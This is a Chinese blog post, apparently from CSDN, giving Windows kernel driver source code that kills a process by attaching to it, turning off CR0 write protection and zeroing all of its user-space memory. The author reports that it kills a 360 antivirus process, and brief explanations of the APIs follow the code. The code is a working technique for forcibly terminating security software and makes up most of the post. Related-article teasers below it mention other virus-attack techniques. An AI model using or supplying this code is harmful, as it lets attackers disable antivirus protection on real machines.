内存填零杀进程

最新推荐文章于 2022-11-11 12:21:09 发布
最新推荐文章于 2022-11-11 12:21:09 发布
阅读量4.4k 收藏
点赞数 1
分类专栏: 内核开发
内存填零杀进程
效果:可以杀掉360的傀儡进程zhudongfangyun.exe但杀360tray.exe时会卡死系统,不知道360tray做了如何保护..

.c代码: 
   
   

    
    

     
     
    
    

    
    

     
     PHYSICAL_ADDRESS g_physicalPage;
    
    

    
    

     
     VOID DestoryProess(ULONG eproc)
    
    

    
    

     
     {
    
    

    
    

     
     	ULONG ulEndAddress = (ULONG)MmSystemRangeStart;
    
    

    
    

     
     	PHYSICAL_ADDRESS physical_addr;
    
    

    
    

     
     	ULONG ulVirtualAddress;
    
    

    
    

     
     	ULONG AddrTemp;
    
    

    
    

     
     	KIRQL irql;
    
    

    
    

     
     	SYSTEM_BASIC_INFORMATION SysBaseInfo; 
    
    

    
    

     
     	NTSTATUS status; 
    
    

    
    

     
     	HANDLE ProcessHandle;
    
    

    
    

     
     
    
    

    
    

     
     	dprintf("MmSystemRangeStart:0x%08x\n", ulEndAddress);
    
    

    
    

     
     
    
    

    
    

     
     	//引入全局变量
    
    

    
    

     
     	status = ZwQuerySystemInformation (SystemBasicInformat, &SysBaseInfo, sizeof (SysBaseInfo), 0); 
    
    

    
    

     
     	if (!NT_SUCCESS(status))
    
    

    
    

     
     	{
    
    

    
    

     
     		dprintf("ZwQuerySystemInformation error\n");
    
    

    
    

     
     		return ;
    
    

    
    

     
     	}
    
    

    
    

     
     	dprintf("pBasicInfo:0x%08x\n", SysBaseInfo);
    
    

    
    

     
     	__asm mov eax,SysBaseInfo.PhysicalPageSize;
    
    

    
    

     
     	__asm mul SysBaseInfo.NumberOfPhysicalPages;
    
    

    
    

     
     	__asm mov g_physicalPage.HighPart, edx;
    
    

    
    

     
     	__asm mov g_physicalPage.LowPart, eax;
    
    

    
    

     
     
    
    

    
    

     
     	KeAttachProcess((PEPROCESS)eproc);
    
    

    
    

     
     	for (ulVirtualAddress = 0x1000;ulVirtualAddress < ulEndAddress; ulVirtualAddress += 0x1000)
    
    

    
    

     
     	{
    
    

    
    

     
     		physical_addr = MmGetPhysicalAddress((PVOID)ulVirtualAddress);
    
    

    
    

     
     		if (physical_addr.HighPart > g_physicalPage.HighPart)
    
    

    
    

     
     		{
    
    

    
    

     
     			continue;
    
    

    
    

     
     		}
    
    

    
    

     
     		if ((physical_addr.HighPart == g_physicalPage.HighPart)&&(physical_addr.LowPart >= g_physicalPage.LowPart))
    
    

    
    

     
     		{
    
    

    
    

     
     			continue;
    
    

    
    

     
     		}
    
    

    
    

     
     		if ((physical_addr.HighPart | physical_addr.LowPart) ==0)
    
    

    
    

     
     		{
    
    

    
    

     
     			continue;
    
    

    
    

     
     		}
    
    

    
    

     
     		AddrTemp = MmGetVirtualForPhysical(physical_addr);
    
    

    
    

     
     		dprintf("ulVirtualAddress:0x%08x, AddrTemp:0x%08x\n",ulVirtualAddress, AddrTemp);
    
    

    
    

     
     		if (AddrTemp != ulVirtualAddress)
    
    

    
    

     
     		{
    
    

    
    

     
     			continue;
    
    

    
    

     
     		}
    
    

    
    

     
     		dprintf("ready for wpoff\n");
    
    

    
    

     
     		irql = WPOFF();
    
    

    
    

     
     		RtlZeroMemory((PVOID)ulVirtualAddress, 0x1000);
    
    

    
    

     
     		WPON(irql);
    
    

    
    

     
     	}
    
    

    
    

     
     	KeDetachProcess();
    
    

    
    

     
     	status = ObOpenObjectByPointer((PVOID)eproc, 0, NULL, 0, NULL, KernelMode, &ProcessHandle);
    
    

    
    

     
     	if (!NT_SUCCESS(status))
    
    

    
    

     
     	{
    
    

    
    

     
     		return ;
    
    

    
    

     
     	}
    
    

    
    

     
     	ZwTerminateProcess(ProcessHandle, STATUS_SUCCESS);
    
    

    
    

     
     	ZwClose(ProcessHandle);
    
    

    
    

     
     }
    
    

    
    

     
     
    
    

    
    

     
     KIRQL WPOFF()
    
    

    
    

     
     {
    
    

    
    

     
     	KIRQL irql=KeRaiseIrqlToDpcLevel();
    
    

    
    

     
     	UINT64 cr0=__readcr0();
    
    

    
    

     
     	cr0 &= 0xfffffffffffeffff;
    
    

    
    

     
     	__writecr0(cr0);
    
    

    
    

     
     	_disable();
    
    

    
    

     
     	return irql;
    
    

    
    

     
     }
    
    

    
    

     
     
    
    

    
    

     
     void WPON(KIRQL irql)
    
    

    
    

     
     {
    
    

    
    

     
     	UINT64 cr0=__readcr0();
    
    

    
    

     
     	cr0 |= 0x10000;
    
    

    
    

     
     	_enable();
    
    

    
    

     
     	__writecr0(cr0);
    
    

    
    

     
     	KeLowerIrql(irql);
    
    

    
    

     
     }
.H文件 
   
   

    
    

     
     
    
    

    
    

     
     VOID DestoryProess(ULONG eproc);
    
    

    
    

     
     typedef enum _SYSTEM_INFORMATION_CLASS 
    
    

    
    

     
     	{
    
    

    
    

     
     	SystemBasicInformat 
    
    

    
    

     
     }SYSTEM_INFORMATION_CLASS;
    
    

    
    

     
     
    
    

    
    

     
     typedef struct _SYSTEM_BASIC_INFORMATION 
    
    

    
    

     
     { 
    
    

    
    

     
     	ULONG Unknown;	
    
    

    
    

     
     	ULONG MaximumIncrement;	 
    
    

    
    

     
     	ULONG PhysicalPageSize;	
    
    

    
    

     
     	ULONG NumberOfPhysicalPages;	
    
    

    
    

     
     	ULONG LowestPhysicalPage;	
    
    

    
    

     
     	ULONG HighestPhysicalPage;	 
    
    

    
    

     
     	ULONG AllocationGranularity; 
    
    

    
    

     
     	ULONG LowestUserAddress;	
    
    

    
    

     
     	ULONG HighestUserAddress; 
    
    

    
    

     
     	ULONG ActiveProcessors;		
    
    

    
    

     
     	UCHAR NumberProcessors;		
    
    

    
    

     
     }SYSTEM_BASIC_INFORMATION, * PSYSTEM_BASIC_INFORMATION;
    
    

    
    

     
     
    
    

    
    

     
     #pragma intrinsic(__readmsr)
    
    

    
    

     
     #pragma intrinsic(_disable)
    
    

    
    

     
     #pragma intrinsic(_enable)
    
    

    
    

     
     KIRQL WPOFF();
    
    

    
    

     
     void WPON(KIRQL irql);
    
    

    
    

     
     
    
    

    
    

     
     VOID
    
    

    
    

     
     	KeAttachProcess ( PRKPROCESS Process
    
    

    
    

     
     	);
    
    

    
    

     
     void KeDetachProcess(); 
    
    

    
    

     
     
    
    

    
    

     
     NTSTATUS ObOpenObjectByPointer(
    
    

    
    

     
     	PVOID Object,
    
    

    
    

     
     	ULONG HandleAttributes,
    
    

    
    

     
     	PACCESS_STATE PassedAccessState,
    
    

    
    

     
     	ACCESS_MASK DesiredAccess,
    
    

    
    

     
     	POBJECT_TYPE ObjectType,
    
    

    
    

     
     	KPROCESSOR_MODE AccessMode,
    
    

    
    

     
     	PHANDLE Handle
    
    

    
    

     
     	);

lkd> dd MmSystemRangeStart
805599d8  80000000 7ffeffff 00000000 00000000
805599e8  00000000 00000000 00000000 00000000
805599f8  00000000 00000000 0000000d 00000000
80559a08  00000000 00000000 00000000 00000000
80559a18  00000000 00000000 00000000 00000000
80559a28  00000000 00000000 00000000 00000000
80559a38  00000000 00000000 00000000 00000000
80559a48  00000000 00000000 00000000 00000000

MmSystemRangeStart是内核导出的一个内核常量, 指出了线性地址的起始位置.从上面可以看出起始位置是80000000.如何打印出? 

   
   

    
    

     
     dprintf("MmSystemRangeStart: 0x%x 0x%x\n", \
    
    

    
    

     
      *(ULONG*)MmSystemRangeStart, *( (ULONG*)MmSystemRangeStart + 1 )  );
    
    

   
   
 
  
 
  
所用到的函数解释:
 
  
1. PHYSICAL_ADDRESS MmGetPhysicalAddress(
  _In_  PVOID BaseAddress
);

 
  
MmGetPhysicalAddress returns the physical address that corresponds to the given virtual address.

 
 
 

 


  其中 PHYSICAL_ADDRESS 在ntdef.h中有定义: 

 

 
 typedef 
   
 LARGE_INTEGER 
  PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; 

 

 
 
 

 

 
 
 

 

 
 2.  

 

 
 
NTSTATUS ObOpenObjectByPointer(
  _In_      PVOID Object,
  _In_      ULONG HandleAttributes,
  _In_opt_  PACCESS_STATE PassedAccessState,
  _In_      ACCESS_MASK DesiredAccess,
  _In_opt_  POBJECT_TYPE ObjectType,
  _In_      KPROCESSOR_MODE AccessMode,
  _Out_     PHANDLE Handle
);
 
 
 
  
   

 

 
 
 

 

 
 
 

 

 
 
 

 


  中间一个小插曲,他的代码中为什么都用DWORD类型,而不用ULONG类型?实际上两者是一样一样的. 

 

 
 
LONG与DWORD都是WinDef.h中定义的宏 

typedef   unsigned   long   ULONG; 
typedef   unsigned   long               DWORD; 

两者一模一样. 

为何我在很多地方看到同时使用这两个类型??? 

例1,在MSDN中代码: 
      DWORD   dw;   ULONG   cbRead; 

例2,在winterdom上的代码: 
            bool   CreateIocp  
 
 
ulong是偏向于“数值”的概念就是无符号长整形,从0到4294967295。 
而DWORD则偏向于这种数据类型所占的字节数为4Bytes,他可以分成高低“字”,等等,通常作为flag
 
 
 
   


                

        

        

    

  


    

      

        

            

              
                
                  小驹
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
驱动 ReadPhysicalMemory 读写 物理内存 参考代码 win7 64

				
			

			

				

					编程论坛
				

				

					06-11
					
					5828
					
				

			

		

		

			
				
#pragma warning( disable: 4100 4103 4146 4213)NTSTATUS ReadPhysicalMemory(char *startaddress, UINT_PTR bytestoread, void *output);UINT_PTR KnownPageTableBase = 0;void VirtualAddressToIndexes(QWORD add...

			
		

	



                

              
                



	

		

			

				
					
Linux虚拟内存系统常用参数说明

				
			

			

				

					Justlinux2010的专栏
				

				

					02-19
					
					5650
					
				

			

		

		

			
				
1.admin_reserve_kbytes
   给有cap_sys_admin权限的用户保留的内存数量,默认值是min(free pages * 3%, 8MB)。这些内存是为了给管理员登录和杀死进程恢复系统提供足够的内存。
2.block_dump
   如果设置的是非零值,则会启用块I/O调试。更多的关于块I/O调试的信息可以参见Documentation/laptops/lapto

			
		

	



                


  
              

                


	

		

			

				
					
用Visual studio11在Windows8上开发驱动实现内存填0杀进程

				
			

			

				

					weixin_30279671的博客
				

				

					10-24
					
					106
					
				

			

		

		

			
				
在Windows NT中,80386保护模式的“保护”比Windows 95中更坚固,这个“镀金的笼子”更加结实,更加难以打破。在Windows 95中,至少应用程序I/O操作是不受限制的,而在Windows NT中,我们的应用程序连这点权限都被剥夺了。在NT中几乎不太可能进入真正的ring0层。在Windows NT中,存在三种Device Driver: 1.“Virtual devi...

			
		

	





	

		

			

				
					
内存不足:杀死进程还是牺牲子进程

				
			

			

				

					szu030606的专栏
				

				

					07-02
					
					826
					
				

			

		

		

			
				
早上6点,我不得不开始处理“叫醒”我的一些问题。因为当这些问题发生的时候,我的手机铃声响了。昏睡中的我非常不情愿地拿起了手机,检查我是否疯狂到将叫醒闹钟设在了早上5点。原来是监控系统发现一个Plumbr服务死掉了。
作为一名该领域经验丰富的高手,我首先来到了咖啡机旁。我需要用一杯咖啡开始工作。第一个问题,在应用崩溃之前看起来一切运行正常。日志中没有错误,没有告警,也没有其他任何异常。
我们的监

			
		

	



		

			
		



	

		

			

				
					
内核态进程管理器Intercessor和实现细节

				
			

			

				

					jingzu的专栏
				

				

					11-27
					
					2158
					
				

			

		

		

			
				
 标 题: 【原创】内核态进程管理器Intercessor和实现细节 作 者: greatcsk  时 间: 2007-09-05,20:20 链 接: http://bbs.pediy.com/showthread.php?t=51157   BLOG原文:http://www.csksoft.net/blog/post/Intercessor_taskmgr.html 相关文件:  已经修

			
		

	





	

		

			

				
					
VC++获取CPU使用率

				
			

			

				

					liuchen1206的专栏
				

				

					06-17
					
					6292
					
				

			

		

		

			
				
#include #include #include #define SystemBasicInformation 0#define SystemPerformanceInformation 2#define SystemTimeInformation 3#define Li2Double(x) ((double)((x).HighPart) * 4.2949672

			
		

	





	

		

			

				
					
病毒攻杀编程技术资料!

				
			

			

				

					09-19
				

			

		

		

			
				
[内存填中断杀进程] [内存填零杀进程] [创建SYSTEM用户进程] [动态API(绕过 三环钩子)] [双进程保护] [双进程保护2] [发送按键] [发送邮件] [取得系统语言] [取得进程] [变相执行EXE] [可以利用的程序(进程保护+...

			
		

	





	

		

			

				
					
资源受限函数式程序设计语言的类型推理与内存分配成本评估

				
			

			

				

					
				

			

		

		

			
				
理论计算机科学电子笔记151(2006)27-45www.elsevier.com/locate/entcs资源受限函数式程序设计语言斯蒂芬·吉尔摩1爱丁堡大学计算机科学基础实验室,爱丁堡EH9 3JZ,苏格兰Olha Shkaravska2Ludwig-Maximilians-...

			
		

	





	

		

			

				
					
Linux操作系统关于进程的控制

					
最新发布

				
			

			

				

					博客记录学习轨迹,方便日后复习
				

				

					11-11
					
					968
					
				

			

		

		

			
				
本文介绍了进程控制的方法,包含进程的创建、进程的终止、进程的等待以及进程程序替换。通过图文内容以及代码的演示,讲解了进程控制的内容!

			
		

	





	

		

			

				
					
Linux 【进程

				
			

			

				

					我心如火
				

				

					09-12
					
					637
					
				

			

		

		

			
				
冯诺依曼体系结构(硬件结构),fork,进程终止,进程等待,进程状态,环境变量,批量化注释+去注释,进程替换,exec系列函数,自制shell

			
		

	





	

		

			

				
					
PVASE Process Virtual Address Space Erasing

				
			

			

				

					
				

				

					06-07
					
					905
					
				

			

		

		

			
				
以下为 rkhdrv40.sys 中强制杀死进程函数的 IDA 反汇编结果,经自动化程序处理为 C 源代码,经 FlowerCode[0GiNr] 部分注释。此函数为 RkU 号称拥有版权的 (c) PVASE Process Virtual Address Space Erasing (进程虚拟地址空间擦除)技术的关键部分。-> Creating instruction listNo type 

			
		

	





	

		

			

				
					
Retrieving MmPhysicalMemoryBlock regardless of the NT version.

				
			

			

				

					
				

				

					10-15
					
					1465
					
				

			

		

		

			
				
 Here is a method I’m using in the next version of Win32DD (1.2), to retrieve MmPhysicalMemoryBlock regardless of the NT Version. The main problem with KDDEBUGGER_DATA64 structure is the version dep

			
		

	





	

		

			

				
					
模拟PspTerminateProcess结束进程-学习笔记

				
			

			

				

					MichaelJScofield的专栏
				

				

					05-27
					
					5559
					
				

			

		

		

			
				
此文是阅读黑防上胡文亮大牛《模拟实现NT系统通用PspTerminateProcess》后作为学习笔记记录下来的,仅作学习记录,理解错的请勿拍砖。和通过特征暴力搜索定位PspTerminateProcess的地址的方法相比,亮点就是模拟了实现PspTerminateProcess,PspTerminateThreadByPointer等函数。

此前先看PJF大牛的一篇《进程终止的内幕》

			
		

	





	

		

			

				
					
深入理解Windows内存管理---1

				
			

			

				

					For Geek
				

				

					05-17
					
					1159
					
				

			

		

		

			
				
内存管理简介
作为一个合格的操作系统,为不同进程之间及用户和内核之间要提供隔离机制。
实现这些基本要求的手段,就是采用基于页面映射的**“虚拟内存”机制,或者说提供“页管理机制”**。
硬件上,这是由CPU内部的“存储管理单元”MMU(Memory Manage Unit)支持的。现代的处理器一般都带有MMU。
软件上,则是由系统内核中的内存管理模块来实现的。
内存管理的解释

广义的内存管理,指...

			
		

	





	

		

			

				
					
驱动开发:内核CR3切换读写内存

					
热门推荐

				
			

			

				

					CSDN
				

				

					09-25
					
					2万+
					
				

			

		

		

			
				
首先CR3是什么,CR3是一个寄存器,该寄存器内保存有页目录表物理地址(PDBR地址),其实CR3内部存放的就是页目录表的内存基地址,运用CR3切换可实现对特定进程内存地址的强制读写操作,此类读写属于有痕读写,多数驱动保护都会将这个地址改为无效,此时CR3读写就失效了,当然如果能找到CR3的正确地址,此方式也是靠谱的一种读写机制。至于进程将CR3改掉了读取不到该寄存器该如何处理,这里我找到了一段参考代码,可以实现寻找CR3地址这个功能。结构,查找结构的方法也很简单,依次遍历进程并对比进程名称即可得到。

			
		

	





	

		

			

				
					
散谈游戏保护那点事~就从_TP开始入手吧

				
			

			

				

					
				

				

					03-19
					
					1691
					
				

			

		

		

			
				
声明:本文只为研究技术,请所有童鞋切勿使用本文之方法做下那天理难容罪恶不舍之坏事。
         既是研究游戏保护,那么总要有一个研究对象。本文就以TMD_TP这款游戏保护为例进行分析讲解。请勿对号入座,如有雷同之处。纯属反汇编引擎之错误,不关我的事!
        转载请注明出处 
        关键字:DNF
驱动保护
        鉴于最近很多同学找上门来求解这那问题,反

			
		

	





	

		

			

				
					
Win64 驱动内核编程-18.SSDT

				
			

			

				

					天使也掉毛
				

				

					03-19
					
					2217
					
				

			

		

		

			
				
SSDT
 学习资料:http://blog.csdn.net/zfdyq0/article/details/26515019
 学习资料:WIN64内核编程基础 胡文亮
 
   SSDT(系统服务描述表),刚开始接触什么进程保护XXX啥的,都是看到在说SSDT(虽然说目前很多杀软都已经采用稳定简单的回调姿势了)。这次就弄清楚两个问题:
    如何在内核里动态获得 SSDT 的基址;

			
		

	





	

		

			

				
					
ARM 学习笔记之7: The Read-Modify-Write operation

				
			

			

				

					LDWJ2016的博客
				

				

					08-17
					
					2437
					
				

			

		

		

			
				
The read-modify-write operation ensures that you modify only the specific bits in a system register that
you want to change.
Individual bits in a system register control different system functionality...

			
		

	





	

		

			

				
					
Windows进程间共享内存实现方法

				
			

			

				

					
				

			

		

		

			
				
"这篇文档详细介绍了在Windows操作系统中如何实现进程间的共享内存,提供了C++的代码示例,包括创建和使用共享内存的步骤。"  在Windows系统中,进程间的通信是一个重要的任务,共享内存是一种高效的方式,允许不同...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值